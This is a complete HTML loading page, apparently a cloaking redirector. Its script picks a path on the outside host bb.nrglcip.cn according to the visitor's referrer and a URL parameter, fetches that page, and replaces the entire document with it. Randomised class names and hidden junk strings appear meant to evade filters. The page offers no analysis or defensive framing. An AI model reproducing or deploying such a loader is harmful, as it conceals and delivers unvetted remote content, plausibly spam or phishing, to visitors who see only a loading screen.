<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .l89RpguMY {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .l89RpguMY .A97BjXp {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .l89RpguMY .content {
            line-height: 50px;
            text-align: center
        }

        .l89RpguMY .img {
            width: 100%
        }

        .l89RpguMY .tV2kMQDcND {
            text-align: center
        }

        .l89RpguMY .tV2kMQDcND span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .l89RpguMY .tV2kMQDcND span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .l89RpguMY .tV2kMQDcND span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .l89RpguMY .tV2kMQDcND span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .l89RpguMY .tV2kMQDcND span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .l89RpguMY .tV2kMQDcND span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .l89RpguMY .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function tBdtLDJ4hWIR(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CvtaQ = tBdtLDJ4hWIR('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CvtaQ +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CvtaQ +".html?a=share";
		}
		
        T53pf5sZ=url+"#"+new Date().getTime();
        T53pf5sZ && function() {
            $.get(T53pf5sZ, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >QQa9X2A8h5gIjcqmDMLwUXedHms1ZnIyltQpdGBZj3LFCPSX4wC30Kjat4QrFEMdCTeCYLPVckIE</ul>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>GaUwKl31E8P4sTAmWDv4pDPqRqxCM0e0QJbzhxY743Dr3MS9nfHFg2a6B3lYtN2wYZl56aIxKgoU6qZZuES3G</a>
<a  href='#' style='display:none'>GaUwKl31E8P4sTAmWDv4pDPqRqxCM0e0QJbzhxY743Dr3MS9nfHFg2a6B3lYtN2wYZl56aIxKgoU6qZZuES3G</a>
<div style='display:none'>DulMe8XYTLhPo5VCBYpco03gKDyFi5OtZIOnUYLk</div>
<div style='display:none'>DulMe8XYTLhPo5VCBYpco03gKDyFi5OtZIOnUYLk</div>
<span style='display:none'>L7Zu8NVBUUzA3SYhiLcxB3O4OB10i9k0IcrZB1v3k3tx9U3MSpoVftsvVDyKJWlPUA8fTG14QttVm8EH</span>
<span style='display:none'>L7Zu8NVBUUzA3SYhiLcxB3O4OB10i9k0IcrZB1v3k3tx9U3MSpoVftsvVDyKJWlPUA8fTG14QttVm8EH</span><div class="l89RpguMY">
    <div class="A97BjXp">
        <div class="tV2kMQDcND">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<a  href='#' style='display:none'>GTb5LKBCQeRqZd12ZcF</a>
<img  src='' style='display:none'></body>
</html>